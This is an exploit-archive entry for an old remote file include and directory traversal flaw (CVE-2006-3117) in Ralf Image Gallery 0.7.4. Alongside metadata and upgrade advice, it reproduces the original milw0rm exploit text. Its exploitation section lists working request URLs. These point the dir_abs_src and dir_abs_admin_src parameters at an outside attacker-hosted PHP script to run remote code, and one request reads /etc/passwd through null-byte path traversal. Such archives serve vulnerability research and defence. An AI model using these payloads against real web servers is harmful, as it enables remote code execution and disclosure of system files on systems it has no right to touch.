Ralf Image Gallery - exploit.company

vendor:

Ralf Image Gallery

by:

'Aesthetico'

7,5

CVSS

HIGH

Multiple Remote File Include and directory traversal

CWE

Product Name: Ralf Image Gallery

Affected Version From: 0.7.4

Affected Version To: 0.7.4

Patch Exists: YES

Related CWE: CVE-2006-3117

CPE: o:rig:rig

Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2006-0573/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2006-3117/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2006-0573/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2006

Ralf Image Gallery <= 0.7.4 - Multiple Remote File Include and directory traversal Vulnerabilities

Ralf Image Gallery (RIG) is prone to multiple remote file include and directory traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker can exploit these issues to execute arbitrary remote PHP code in the context of the webserver process, or to view sensitive files on the affected computer.

Mitigation:

Upgrade to version 0.7.5 or later.

Source

Exploit-DB raw data:

Title: Ralf Image Gallery <= 0.7.4 - Multiple Remote File Include and directory
traversal Vulnerabilities
-----------------------------------------------------------------
Vendor: RIG is developed and maintained by Le R'alf
URL: http://rig.powerpulsar.com/
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------

Exploitation:
-----------------------------------------------------------------

/check_entry.php?dir_abs_src=http://www.yourspace.com/yourscript.php?
/check_entry.php?dir_abs_src=../../../../../../../../../etc/passwd%00
/admin_album.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
/admin_image.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
/admin_translate.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-06-22]